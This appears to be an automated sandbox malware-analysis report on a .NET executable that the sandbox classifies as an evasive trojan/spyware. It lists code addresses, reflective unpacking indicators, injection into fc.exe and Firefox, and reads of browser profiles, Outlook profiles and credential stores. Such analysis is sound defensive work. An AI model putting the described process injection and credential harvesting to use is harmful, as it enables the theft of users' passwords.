                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01739EB02_2_01739EB0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0324132D7_2_0324132D
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0317D34C7_2_0317D34C
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0324A3527_2_0324A352
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031D739A7_2_031D739A
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_032503E67_2_032503E6
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0319E3F07_2_0319E3F0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_032302747_2_03230274
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031952A07_2_031952A0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_032312ED7_2_032312ED
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031AB2C07_2_031AB2C0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031AD2F07_2_031AD2F0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031801007_2_03180100
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0322A1187_2_0322A118
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0325B16B7_2_0325B16B
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0317F1727_2_0317F172
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031C516C7_2_031C516C
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_032501AA7_2_032501AA
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0319B1B07_2_0319B1B0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_032481CC7_2_032481CC
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0324F0E07_2_0324F0E0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_032470E97_2_032470E9
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031970C07_2_031970C0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0323F0CC7_2_0323F0CC
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031B47507_2_031B4750
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031907707_2_03190770
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0324F7B07_2_0324F7B0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0318C7C07_2_0318C7C0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_032416CC7_2_032416CC
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031AC6E07_2_031AC6E0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031905357_2_03190535
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_032475717_2_03247571
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0322D5B07_2_0322D5B0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_032505917_2_03250591
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0324F43F7_2_0324F43F
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_032424467_2_03242446
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031814607_2_03181460
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0323E4F67_2_0323E4F6
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0324FB767_2_0324FB76
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0324AB407_2_0324AB40
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031AFB807_2_031AFB80
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031CDBF97_2_031CDBF9
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_03246BD77_2_03246BD7
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_03203A6C7_2_03203A6C
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_03247A467_2_03247A46
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0324FA497_2_0324FA49
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0322DAAC7_2_0322DAAC
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0318EA807_2_0318EA80
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031D5AA07_2_031D5AA0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0323DAC67_2_0323DAC6
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031999507_2_03199950
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031AB9507_2_031AB950
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031A69627_2_031A6962
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0325A9A67_2_0325A9A6
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031929A07_2_031929A0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031FD8007_2_031FD800
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031928407_2_03192840
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0319A8407_2_0319A840
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031768B87_2_031768B8
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031BE8F07_2_031BE8F0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031938E07_2_031938E0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031B0F307_2_031B0F30
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0324FF097_2_0324FF09
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031D2F287_2_031D2F28
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_03204F407_2_03204F40
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_03191F927_2_03191F92
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0324FFB17_2_0324FFB1
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_03182FC87_2_03182FC8
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0324EE267_2_0324EE26
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_03190E597_2_03190E59
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031A2E907_2_031A2E90
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_03199EB07_2_03199EB0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0324CE937_2_0324CE93
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0324EEDB7_2_0324EEDB
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0319AD007_2_0319AD00
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_03247D737_2_03247D73
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_03193D407_2_03193D40
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_03241D5A7_2_03241D5A
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031A8DBF7_2_031A8DBF
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031AFDC07_2_031AFDC0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0318ADE07_2_0318ADE0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_03209C327_2_03209C32
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_03190C007_2_03190C00
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_03230CB57_2_03230CB5
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0324FCF27_2_0324FCF2
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_03180CF27_2_03180CF2
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02A11C507_2_02A11C50
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02A152E07_2_02A152E0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02A013A17_2_02A013A1
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02A0B10B7_2_02A0B10B
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02A1350C7_2_02A1350C
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02A135107_2_02A13510
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02A0CBA07_2_02A0CBA0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02A2B9707_2_02A2B970
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02A0AE407_2_02A0AE40
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02A0CDC07_2_02A0CDC0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0309038F7_2_0309038F
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0309E2BB7_2_0309E2BB
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0309E1537_2_0309E153
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0309E0387_2_0309E038
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0309D5B87_2_0309D5B8
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0309E4EC7_2_0309E4EC
                Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 031D7E54 appears 86 times
                Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 031C5130 appears 36 times
                Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 031FEA12 appears 85 times
                Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 0317B970 appears 250 times
                Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 0320F290 appears 103 times
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: String function: 017AF290 appears 103 times
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: String function: 01777E54 appears 101 times
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: String function: 0179EA12 appears 86 times
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: String function: 0171B970 appears 262 times
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: String function: 01765130 appears 58 times
                Source: SDBARVe3d3.exe, 00000000.00000002.1696654760.0000000007BD0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SDBARVe3d3.exe
                Source: SDBARVe3d3.exe, 00000000.00000000.1665128018.00000000009E8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSPJ.exeD vs SDBARVe3d3.exe
                Source: SDBARVe3d3.exe, 00000000.00000002.1692294980.0000000000EAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SDBARVe3d3.exe
                Source: SDBARVe3d3.exe, 00000002.00000002.2050351362.000000000115C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFC.EXEj% vs SDBARVe3d3.exe
                Source: SDBARVe3d3.exe, 00000002.00000002.2050668467.000000000181D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SDBARVe3d3.exe
                Source: SDBARVe3d3.exe, 00000002.00000002.2050351362.0000000001147000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFC.EXEj% vs SDBARVe3d3.exe
                Source: SDBARVe3d3.exeBinary or memory string: OriginalFilenameSPJ.exeD vs SDBARVe3d3.exe
                Source: SDBARVe3d3.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: SDBARVe3d3.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.SDBARVe3d3.exe.7bd0000.4.raw.unpack, aCrGcrkf57MYV9WXHR.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SDBARVe3d3.exe.7bd0000.4.raw.unpack, cxomU88yvrxlG3O631.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.SDBARVe3d3.exe.7bd0000.4.raw.unpack, cxomU88yvrxlG3O631.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SDBARVe3d3.exe.7bd0000.4.raw.unpack, cxomU88yvrxlG3O631.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.SDBARVe3d3.exe.3fa5dd0.1.raw.unpack, aCrGcrkf57MYV9WXHR.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SDBARVe3d3.exe.3f1e3b0.2.raw.unpack, cxomU88yvrxlG3O631.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.SDBARVe3d3.exe.3f1e3b0.2.raw.unpack, cxomU88yvrxlG3O631.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SDBARVe3d3.exe.3f1e3b0.2.raw.unpack, cxomU88yvrxlG3O631.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.SDBARVe3d3.exe.3f1e3b0.2.raw.unpack, aCrGcrkf57MYV9WXHR.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SDBARVe3d3.exe.3fa5dd0.1.raw.unpack, cxomU88yvrxlG3O631.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.SDBARVe3d3.exe.3fa5dd0.1.raw.unpack, cxomU88yvrxlG3O631.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SDBARVe3d3.exe.3fa5dd0.1.raw.unpack, cxomU88yvrxlG3O631.csSecurity API names: _0020.AddAccessRule
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@16/12
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SDBARVe3d3.exe.logJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\fc.exeFile created: C:\Users\user\AppData\Local\Temp\0349A-nJump to behavior
                Source: SDBARVe3d3.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: SDBARVe3d3.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: fc.exe, 00000007.00000002.4133667940.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000007.00000003.2289909902.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000007.00000002.4133667940.0000000002BC9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: SDBARVe3d3.exeReversingLabs: Detection: 65%
                Source: unknownProcess created: C:\Users\user\Desktop\SDBARVe3d3.exe "C:\Users\user\Desktop\SDBARVe3d3.exe"
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess created: C:\Users\user\Desktop\SDBARVe3d3.exe "C:\Users\user\Desktop\SDBARVe3d3.exe"
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeProcess created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"
                Source: C:\Windows\SysWOW64\fc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess created: C:\Users\user\Desktop\SDBARVe3d3.exe "C:\Users\user\Desktop\SDBARVe3d3.exe"Jump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeProcess created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\fc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: SDBARVe3d3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: SDBARVe3d3.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: SDBARVe3d3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: fc.pdb source: SDBARVe3d3.exe, 00000002.00000002.2050351362.0000000001147000.00000004.00000020.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000006.00000002.4134145425.00000000013C8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: fc.pdbGCTL source: SDBARVe3d3.exe, 00000002.00000002.2050351362.0000000001147000.00000004.00000020.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000006.00000002.4134145425.00000000013C8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: wPGxKDFwovcH.exe, 00000006.00000000.1972969938.000000000080E000.00000002.00000001.01000000.0000000C.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4133718040.000000000080E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: SPJ.pdbSHA2568 source: SDBARVe3d3.exe
                Source: Binary string: wntdll.pdbUGP source: SDBARVe3d3.exe, 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000007.00000003.2059512565.0000000002F9E000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000007.00000003.2057269655.0000000002DEF000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: SDBARVe3d3.exe, SDBARVe3d3.exe, 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, fc.exe, 00000007.00000003.2059512565.0000000002F9E000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000007.00000003.2057269655.0000000002DEF000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: SPJ.pdb source: SDBARVe3d3.exe

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: SDBARVe3d3.exe, FormGame.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: SDBARVe3d3.exe, FormGame.cs.Net Code: InitializeComponent
                Source: 0.2.SDBARVe3d3.exe.3f1e3b0.2.raw.unpack, cxomU88yvrxlG3O631.cs.Net Code: k5LtLXIGfq System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SDBARVe3d3.exe.3fa5dd0.1.raw.unpack, cxomU88yvrxlG3O631.cs.Net Code: k5LtLXIGfq System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SDBARVe3d3.exe.7bd0000.4.raw.unpack, cxomU88yvrxlG3O631.cs.Net Code: k5LtLXIGfq System.Reflection.Assembly.Load(byte[])
                Source: 7.2.fc.exe.37bcd14.2.raw.unpack, FormGame.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: 7.2.fc.exe.37bcd14.2.raw.unpack, FormGame.cs.Net Code: InitializeComponent
                Source: 8.0.wPGxKDFwovcH.exe.2bacd14.1.raw.unpack, FormGame.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: 8.0.wPGxKDFwovcH.exe.2bacd14.1.raw.unpack, FormGame.cs.Net Code: InitializeComponent
                Source: 8.2.wPGxKDFwovcH.exe.2bacd14.1.raw.unpack, FormGame.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: 8.2.wPGxKDFwovcH.exe.2bacd14.1.raw.unpack, FormGame.cs.Net Code: InitializeComponent
                Source: 9.2.firefox.exe.2f9ccd14.0.raw.unpack, FormGame.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: 9.2.firefox.exe.2f9ccd14.0.raw.unpack, FormGame.cs.Net Code: InitializeComponent
                Source: SDBARVe3d3.exeStatic PE information: 0x9A3030A7 [Fri Dec 22 09:17:27 2051 UTC]
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 0_2_0516DCBA pushfd ; retf 0_2_0516DCC1
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0041600F push esp; retf 2_2_00416030
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_00405119 push ss; retf 2_2_0040511A
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0040AA27 push cs; iretd 2_2_0040AA28
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_004142D9 push esp; retf 2_2_004142DA
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_00403330 push eax; ret 2_2_00403332
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0041844F push eax; iretd 2_2_00418450
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_004165B3 push 00000032h; ret 2_2_004166AF
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_00416662 push 00000032h; ret 2_2_004166AF
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_00404EDD push ds; iretd 2_2_00404EED
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_00416683 push 00000032h; ret 2_2_004166AF
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_00404EB6 push ecx; iretd 2_2_00404EC1
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0041175E pushad ; retf 2_2_0041176E
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_00406737 push eax; retf 2_2_0040673B
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017209AD push ecx; mov dword ptr [esp], ecx2_2_017209B6
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_031809AD push ecx; mov dword ptr [esp], ecx7_2_031809B6
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02A1C2B9 push ebx; retf 7_2_02A1C2F9
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02A1C2BB push ebx; retf 7_2_02A1C2F9
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02A13280 push 00000032h; ret 7_2_02A1337C
